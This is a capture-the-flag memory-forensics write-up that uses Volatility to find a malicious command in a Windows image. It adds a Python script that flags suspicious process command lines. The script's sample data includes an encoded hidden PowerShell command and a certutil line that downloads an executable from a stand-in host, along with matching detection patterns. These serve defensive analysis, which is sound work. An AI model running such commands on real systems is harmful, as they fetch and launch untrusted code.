We're given a .raw file (honeypot.raw).
Based on the challenge instructions, we need to find three things in the file.
After analyzing the file, I can tell that it is a memory image of a machine. We can use a tool such as Volatility
to help us analyze the memory.
First, we need to find a profile that matches the image.
python2 volatility/vol.py -f honeypot.raw imageinfo
I use the first profile recommendation, Win7SP1x86_23418.
We can use the cmdline plugin
to see each process and the command line it was started with.
python2 volatility/vol.py -f honeypot.raw --profile=Win7SP1x86_23418 cmdline
From there, we can see the malicious command that ran on the machine, together with its PID.
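Reading through cmdline output by hand works for a small image, but it helps to parse it and flag the entries worth a closer look. The script below is an added example and is not part of the original writeup or of Volatility itself: it parses the text format the Volatility 2 cmdline plugin prints (a "name pid: N" header followed by a "Command line : ..." line for each process) and applies a small, hypothetical set of command-line indicators that defenders commonly use. The sample output embedded in the script is constructed for illustration and is not taken from honeypot.raw.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of what `vol.py ... --profile=... cmdline` prints.
# It is NOT output from the writeup's honeypot.raw image.
SAMPLE_CMDLINE_OUTPUT = r"""
************************************************************************
System pid:      4
************************************************************************
smss.exe pid:    228
Command line : \SystemRoot\System32\smss.exe
************************************************************************
explorer.exe pid:   1432
Command line : C:\Windows\Explorer.EXE
************************************************************************
powershell.exe pid:   2056
Command line : powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
************************************************************************
cmd.exe pid:   2300
Command line : cmd.exe /c certutil -urlcache -split -f http://example.invalid/x.exe C:\Users\Public\x.exe
"""

# One process header line, e.g. "explorer.exe pid:   1432"
HEADER_RE = re.compile(r"^(?P<name>\S+) pid:\s+(?P<pid>\d+)\s*$")
# The command line that follows the header (absent for System and some kernel-only processes)
CMDLINE_RE = re.compile(r"^Command line : (?P<cmd>.*)$")

# Hypothetical indicator set: patterns a defender typically flags in process command lines.
SUSPICIOUS_PATTERNS = {
    "encoded PowerShell": re.compile(r"(?i)powershell.*\s-(e|ec|enc|encodedcommand)\b"),
    "hidden window": re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b"),
    "certutil download": re.compile(r"(?i)certutil.*-urlcache"),
}


def parse_cmdline_output(text: str) -> List[Dict[str, object]]:
    """Turn Volatility 2 `cmdline` plugin text into [{name, pid, cmdline}, ...].
    Processes with no retrievable command line get cmdline=None."""
    entries: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = {"name": m.group("name"), "pid": int(m.group("pid")), "cmdline": None}
            entries.append(current)
            continue
        m = CMDLINE_RE.match(line)
        if m and current is not None:
            current["cmdline"] = m.group("cmd").strip()
    return entries


def find_suspicious(entries: List[Dict[str, object]]) -> List[Tuple[int, str, List[str]]]:
    """Return (pid, name, [matched indicators]) for each entry hitting at least one pattern."""
    hits = []
    for e in entries:
        cmd = e["cmdline"]
        if not cmd:
            continue
        reasons = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(str(cmd))]
        if reasons:
            hits.append((int(e["pid"]), str(e["name"]), reasons))
    return hits


if __name__ == "__main__":
    # In practice: pipe the real plugin output into this script instead of the constructed sample.
    for pid, name, reasons in find_suspicious(parse_cmdline_output(SAMPLE_CMDLINE_OUTPUT)):
        print(f"PID {pid:>5}  {name:<16} {', '.join(reasons)}")
```

To use it on a real image, save the plugin output (for example `python2 volatility/vol.py -f honeypot.raw --profile=Win7SP1x86_23418 cmdline > cmdline.txt`) and feed the file's contents to parse_cmdline_output. The flagged PIDs are the ones to pivot on with other plugins such as pstree or handles; the indicator list is deliberately small and should be extended to whatever the investigation calls for.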